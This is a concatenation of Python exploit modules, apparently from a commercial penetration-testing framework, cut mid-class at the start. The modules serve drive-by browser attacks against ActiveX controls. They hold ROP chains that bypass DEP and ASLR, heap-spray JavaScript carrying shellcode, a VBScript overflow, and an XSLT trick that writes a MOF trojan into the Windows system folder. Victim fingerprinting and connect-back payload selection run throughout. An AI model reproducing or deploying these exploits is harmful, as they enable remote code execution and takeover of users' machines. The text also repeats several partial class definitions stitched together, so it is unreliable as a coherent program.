self.log("WP> Target has MSIE 6")
language = info_dict['plugins'].get("language", "")
if type(language)==type([]):
language=language[0] #it's a list in actuality
self.log("WP> language found: %s"%language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets,"-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
# If Called from clientD, update shellcode accordingly
if self.isClientD:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
# Selected shell options
self.wp_getShellcodeType()
# If called from clientD there will be no target here
if self.target:
self.host=self.target.interface
self.filename=self.argsDict.get('filename',self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s'%(t,targets[t][0])
return
def makefile(self):
searchcode = wp_SearchCode(True)
payload = wp_randomstring(1024) + pack('<L', 0x7C341124)
payload += wp_randomstring(12)
payload += self.wp_sayonaraASLRDEPBypass((len(searchcode)+8))
payload += searchcode
payload += wp_randomstring(1024)
payload += 'c00kc00k'
payload += self.wp_sayonaraASLRDEPBypass((len(self.shellcode)+8))
payload += self.shellcode
payload += wp_randomstring(8192 - len(payload))
#Base filedata
filedata="""<html>
<object classid='clsid:5C2A52BD-2250-4F6B-A4D2-D1D00FCD748C' id='target' ></object>
<script language='javascript'>
arg1 = "PAYLOAD";
arg2 = "1";
arg3 = "1";
target.CreateProcess(arg1, arg2, arg3);
</script>
</html>
"""
filedata = filedata.replace('PAYLOAD', payload)
return filedata
def makesploit(self,clientheader,clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header,body
h=header('SERVER')
b=body()
self.log("WP> URL Received: %s"%clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit file')
data=self.makefile()
if not data:
return None,None
b.setBody(data)
h.addHeader('Content-Type','text/html')
h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status='302'
h.addHeader('Location',self.filename)
h.addHeader('Content-Type','text/html')
return h,b
def run(self):
filedata=self.makefile()
outputfile = wp_outputpath(self.filename)
self.log("WP> Opening %s for output"%outputfile)
fd=file(outputfile,'wb+')
fd.write(filedata)
fd.close()
self.log('WP> Wrote to %s'%(outputfile))
return 1
class theexploit(wp_exploit, httpclientside):
######################################################################################
## WP> Dialog Information
##########################s############################################################
PAYLOADS = [
"IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN",
"Execute Command"
]
DEFAULT_PAYLOAD = 1
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.encode_printable = True
self.badstring = "\x00\x09\x0d\xff"
#Randomisze name for clientd
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def is_vulnerable(self, info_dict):
# Called from ClientD, returns a value used to rank the exploit within attacking modules
"""
Check for IE
"""
self.isClientD = True
if "MSIE" in info_dict['user_agent']:
self.log("WP> Target has MSIE")
language = info_dict['plugins'].get("language", "")
if type(language) == type([]):
language = language[0] #it's a list in actuality
self.log("WP> language found: %s" % language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets, "-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
self.log('WP> Targeting version %d: %s' %
(self.version, targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
# If Called from clientD, update shellcode accordingly
if self.isClientD:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
# Selected shell options
self.wp_getShellcodeType()
# If called from clientD there will be no target here
if self.target:
self.host = self.target.interface
self.filename = self.argsDict.get('filename', self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s' % (t, targets[t][0])
return
def makefile(self):
# Make the exploit file
depSc = pack('<L', 0x1001403B) # PUSH ESP, POP EDI,
depSc += pack('<L', 0x11111111)
depSc += pack('<L', 0x11111111)
depSc += pack('<L', 0x11111111)
depSc += pack('<L', 0x10011BC5) #MOV EAX,EDI,
depSc += pack('<L', 0x11111111)
depSc += pack('<L', 0x11111111)
depSc += pack('<L', 0x1001175B) #ADD EAX,20
depSc += pack('<L', 0x1001175B)
depSc += pack('<L', 0x1001175B)
depSc += pack('<L', 0x1001175B)
depSc += pack('<L', 0x1001175B)
depSc += pack('<L', 0x1001175B)
depSc += pack('<L', 0x10017374) #POP ECX
depSc += pack('<L', 0x22222220)
depSc += pack('<L', 0x1002B040) #MOV EDX,EAX
depSc += pack('<L', 0x10027938) #MOV EAX,EDX
depSc += pack('<L', 0x10022BB2) #MOV DWORD PTR DS:[EDX],EAX
depSc += pack('<L', 0x10027BE0) #XOR EAX,EAX
depSc += pack('<L', 0x10027BD7) #ADD EDX,4
depSc += pack('<L', 0x10022276) #POP EAX
depSc += pack('<L', 0x111118E1) # Size 2000 bytes
depSc += pack('<L', 0x10017374) # POP ECX
depSc += pack('<L', 0x11111111)
depSc += pack('<L', 0x1001BE16) #SUB EAX,ECX
depSc += pack('<L', 0x10022BB2) #MOV DWORD PTR DS:[EDX],EAX
depSc += pack('<L', 0x10027BE0) #XOR EAX,EAX
depSc += pack('<L', 0x10027BD7) #ADD EDX,4
depSc += pack('<L', 0x10022276) #POP EAX
depSc += pack('<L', 0x11112111)
depSc += pack('<L', 0x10017374) # POP ECX
depSc += pack('<L', 0x11111111)
depSc += pack('<L', 0x1001BE16) #SUB EAX,ECX
depSc += pack('<L', 0x10022BB2) #MOV DWORD PTR DS:[EDX],EAX
depSc += pack('<L', 0x10027BE0) #XOR EAX,EAX
depSc += pack('<L', 0x10027BD7) #ADD EDX,4
depSc += pack('<L', 0x10022276) #POP EAX
depSc += pack('<L', 0x11111151)
depSc += pack('<L', 0x10017374) # POP ECX
depSc += pack('<L', 0x11111111)
depSc += pack('<L', 0x1001BE16) #SUB EAX,ECX
depSc += pack('<L', 0x10022BB2) #MOV DWORD PTR DS:[EDX],EAX
depSc += pack('<L', 0x10011A05) #POP EBX pop writeable
depSc += pack('<L', 0x1003ef40) #
depSc += pack('<L', 0x10022276) #POP EAX
depSc += pack('<L', 0x1002D104) # Import Address
depSc += pack('<L', 0x10011A06) # RET
depSc += pack('<L', 0x10011A06) # RET
depSc += pack('<L', 0x10021DA6) # CALL DWORD PTR DS:[EAX]
depSc += pack('<L', 0x11111111) #SPACE
depSc += pack('<L', 0x11111111) #SPACE
depSc += pack('<L', 0x11111111) #SPACE
depSc += pack('<L', 0x11111111) #SPACE
depSc += pack('<L', 0x1001403B) # PUSH ESP, POP EDI,
depSc += pack('<L', 0x90909090)
depSc += pack('<L', 0x44444444) # Fix ESP
depSc += pack('<L', 0x04eb9090) # Jmp over call
depSc += pack('<L', 0x1002716A) # Call EDI
depSc += self.shellcode
filedata = """
<html>
<object classid='clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3'
id='target'></object>
<script language = 'vbscript'>
buf = String(8293, "A")
ret = unescape("%D9%C7%02%10")
padsp = String(16, "a")
sc = unescape("SHELLCODE")
exploit = buf + ret + padsp + sc
target.Get exploit
</script>
<html>
""".replace('SHELLCODE', urlencode(depSc))
return filedata
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit file')
data = self.makefile()
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def run(self):
filedata = self.makefile()
self.log("WP> Opening %s for output" % (self.filename))
fd = file(self.filename, 'wb+')
fd.write(filedata)
fd.close()
self.log('WP> Wrote to %s' % (self.filename))
return 1
class theexploit(wp_exploit, httpclientside):
######################################################################################
## WP> Dialog Information
##########################s############################################################
PAYLOADS=["IE Inject Connect Back",
"HTTPMOSDEF SSL",
"HTTPMOSDEF PLAIN",
"Execute Command"]
# Clienside exploits default to HTTPMosdef PLAIN for clientD
DEFAULT_PAYLOAD = 2
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.encode_printable = True
self.alignstack = True
self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c"
self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) #+ ".xml"
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
self.vProtect = True
self.useRawShellcode = True
return
def is_vulnerable(self, info_dict):
# Called from ClientD, if recon modules are enabled
# returns a value used to rank the exploit within attacking modules
"""
Check for IE
"""
self.isClientD = True
if "Safari" in info_dict['user_agent']:
self.log("WP> Target has Safari")
language = info_dict['plugins'].get("language", "")
if type(language)==type([]):
language=language[0] # it's a list in actuality
self.log("WP> language found: %s"%language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets,"-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
# If Called from clientD, update shellcode accordingly
if getattr(self,'useSSLMOSDEF',False):
self.isClientD = True
self.DEFAULT_PAYLOAD = 1
else:
# Potentially called from httpserver update shellcode accordingly
if self.HTTPMOSDEF:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
# Selected shell options
self.wp_getShellcodeType()
# If called from clientD there will be no target here
if self.target:
self.host=self.target.interface
self.filename=self.argsDict.get('filename',self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s'%(t,targets[t][0])
return
def makefile(self):
myPElib = pelib.PElib()
try:
self.mosdeftrojan=myPElib.createPEFileBuf(self.shellcode)
except Exception, err:
self.log("WP> Problem building MOSDEF PE Trojan: %s"%(err))
self.setInfo("WP> %s attacking %s:%d - completed (failed!)"%(NAME,self.host,self.port))
return 0
self.mosdeftrojan = wp_GenerateMOF(self.mosdeftrojan)
payloadFilename = "".join( [ random.choice(string.lowercase) for x in range(16) ] ) + '.mof'
self.log("WP> Attempting Remote Code Execution via Wbem\Mof")
filedata = '''<?xml-stylesheet type="text/xml" href="#fragment"?>
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet
id ID #REQUIRED
>]>
<doc>
<mof>
<location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\wbem\\mof\\MOF_FILENAME]></location>
<content><![CDATA[MOF_PAYLOAD]]></content>
</mof>
<xsl:stylesheet id="fragment" version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:sx="http://icl.com/saxon"
extension-element-prefixes="sx"
xmlns="http://www.w3.org/1999/xhtml" >
<xsl:output method="xml" indent="yes" />
<xsl:template match="/">
<xsl:variable name="moflocation" select="//mof/location/text()"/>
<sx:output file="{$moflocation}" method="text">
<xsl:value-of select="//mof/content"/>
</sx:output>
<html> </html>
</xsl:template>
</xsl:stylesheet>
</doc>'''
filedata = filedata.replace('MOF_FILENAME', payloadFilename)
filedata = filedata.replace('MOF_PAYLOAD', self.mosdeftrojan)
return filedata
class theexploit(wp_exploit, httpclientside):
######################################################################################
## WP> Dialog Information
##########################s############################################################
PAYLOADS=["IE Inject Connect Back",
"HTTPMOSDEF SSL",
"HTTPMOSDEF PLAIN",
"Execute Command"]
# Clienside exploits default to HTTPMosdef PLAIN for clientD
DEFAULT_PAYLOAD = 2
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.use_universal = True
self.isClientD = False
self.badstring = "\x00"
#Ranomisze name for clientd
self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def is_vulnerable(self, info_dict):
# Called from ClientD, if recon modules are enabled
# returns a value used to rank the exploit within attacking modules
"""
Check for IE
"""
self.isClientD = True
if "MSIE" in info_dict['user_agent']:
self.log("WP> Target has MSIE")
language = info_dict['plugins'].get("language", "")
if type(language)==type([]):
language=language[0] #it's a list in actuality
self.log("WP> language found: %s"%language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets,"-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
# If Called from clientD, update shellcode accordingly
if getattr(self,'useSSLMOSDEF',False):
self.isClientD = True
self.DEFAULT_PAYLOAD = 1
else:
# Potentially called from httpserver update shellcode accordingly
if self.HTTPMOSDEF:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
# Selected shell options
self.wp_getShellcodeType()
# If called from clientD there will be no target here
if self.target:
self.host=self.target.interface
self.filename=self.argsDict.get('filename',self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s'%(t,targets[t][0])
return
def makefile(self):
# Make the exploit file
#Base filedata
filedata="""<html><body>
<object classid="clsid:39344399-FEF9-467E-835E-B994B021DEB6"></object>
"""
filedata += """<script language="JavaScript">"""
#script code
script = """
memory = new Array();
shellcode = unescape("SHELLCODE");
var heapspray = unescape("%u6e1f%u7c36%u10FD%u7c34");
var len= shellcode.length + 0x21; //0x21 is heap header
while(heapspray.length < 0x120000) heapspray += heapspray;
heapspray = heapspray.substring(0, 0x120000- length);
depbypass = unescape("%u4cc2%u7c34")
depbypass = depbypass + unescape("%u4cc2%u7c34")
depbypass = depbypass + unescape("%u1920%u7c34") // POP ESI
depbypass = depbypass + unescape("%ub2f8%u7c38") // 7c38b308-10 Value that points to a writeable ptr space
depbypass = depbypass + unescape("%u7618%u7c34") // PUSH ESP,POP
depbypass = depbypass + unescape("%u1111%u1111") //
depbypass = depbypass + unescape("%ua458%u7c34") // VirtualAlloc
depbypass = depbypass + unescape("%u1111%u1111") //
depbypass = depbypass + unescape("%u1111%u1111") //
depbypass = depbypass + unescape("%u1111%u1111") //
depbypass = depbypass + unescape("%u1111%u1111") //
depbypass = depbypass + unescape("%u07d0%u0000") // Size 7d0
depbypass = depbypass + unescape("%u1000%u0000") // Type
depbypass = depbypass + unescape("%u0040%u0000") // Protect
depbypass = depbypass + unescape("%u1111%u1111") //
depbypass = depbypass + unescape("%u1111%u1111") //
depbypass = depbypass + unescape("%u5c30%u7c34") // push esp,ret
heapspray= heapspray + depbypass + shellcode;
try{
for(var i = 0; i < 3000; i++) {
memory[i]= heapspray.substring(0,heapspray.length);
}
}
catch(err)
{}
"""
script = script.replace('SHELLCODE',wp_urluencode(self.shellcode + ("\x00" * 100)))
#Obfuscate the script code (disabled for this exploit)
self.isClientD=False
if self.isClientD:
self.log("WP> Running jsObfuscator")
filedata += self.jsObfuscator.obfuscate(script)
else:
filedata += script
# Add the reset of the filedata
filedata += """
</SCRIPT>
<object classid="clsid:A2282403-50DE-4A2E-A118-B90AEDB1ADCC"></object>
</body>
</html>
"""
return filedata
def makesploit(self,clientheader,clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header,body
h=header('SERVER')
b=body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s"%clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
#self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit file')
data=self.makefile()
if not data:
return None,None
b.setBody(data)
h.addHeader('Content-Type','text/html')
h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status='302'
h.addHeader('Location',self.filename)
h.addHeader('Content-Type','text/html')
self.log('WP> ****************************************')
return h,b
def run(self):
filedata=self.makefile()
self.log("WP> Opening %s for output"%(self.filename))
fd=file(self.filename,'wb+')
fd.write(filedata)
fd.close()
self.log('WP> Wrote to %s'%(self.filename))
return 1
class theexploit(wp_exploit, httpclientside):
PAYLOADS = ["IE Inject Connect Back", "Execute Command"]
DEFAULT_PAYLOAD = 0
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.encode_printable = True
self.alignstack = True
self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c"
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
self.filename2 = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def is_vulnerable(self, info_dict):
"""
Check for IE
"""
self.isClientD = True
if "MSIE" in info_dict['user_agent']:
self.log("WP> Target has MSIE")
language = info_dict['plugins'].get("language", "")
if type(language) == type([]):
language = language[0]
self.log("WP> language found: %s" % language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets, "-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
self.log('WP> Targeting version %d: %s' %
(self.version, targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
if getattr(self, 'useSSLMOSDEF', False):
self.isClientD = True
self.DEFAULT_PAYLOAD = 1
else:
if self.HTTPMOSDEF:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
self.wp_getShellcodeType()
if self.target:
self.host = self.target.interface
self.filename = self.argsDict.get('filename', self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s' % (t, targets[t][0])
return
def makefile(self, browser, osversion):
if osversion == "Windows XP":
if browser == "MSIE 7.0":
self.log('WP> Serving Windows XP IE7 exploit')
return self.makefileIE7_XP()
self.log('WP> Invalid target')
return
def makefileIE7_XP(self):
payload = "\x8B\xE0" # MOV ESP,EAX
payload += "\x83\xC4\x05" # ADD ESP,05
payload += self.shellcode
payload += wp_randomstring((5120 - len(payload)))
filedata = """<html>
<head>
<script>"""
script = wp_clientside_HeapLib(padding="%u0c0c")
#script code
script += """
var heap_obj = new heapLib.ie(0x20000);
var nops = unescape("NOPS");
var code = unescape("SHELLCODE");
while (nops.length < 0x2000) nops += nops;
var offset = nops.substring(0, 0x5F4);
var shellcode = offset + code + nops.substring(0, 0x1000-code.length-offset.length);
while (shellcode.length < 0x80000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x300; z++) {
heap_obj.alloc(block);
}
"""
script = script.replace('SHELLCODE', wp_urluencode(payload))
script = script.replace('NOPS', wp_urluencode(pack('<L', 0x0c0c0c0c)))
#Obfuscate the script code (disabled for this exploit)
self.isClientD = False
if self.isClientD:
self.log("WP> Running jsObfuscator")
filedata += self.jsObfuscator.obfuscate(script)
else:
filedata += script
filedata += self.maketrigger()
return filedata
def maketrigger(self):
filedata = """</script>
<body>
<object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='target'></object>
<script>
target.StopModule(%s);
</script>
</body>
</html>
""" % ((0x0c0c0c0c / 0x134))
return filedata
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
cookies = clientheader.getStrValue(['Cookie'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
if clientheader.URL.count(self.filename):
data = self.makefile(browser, osversion)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def run(self):
self.log('WP> This module must be run via HTTPSERVER')
return 0
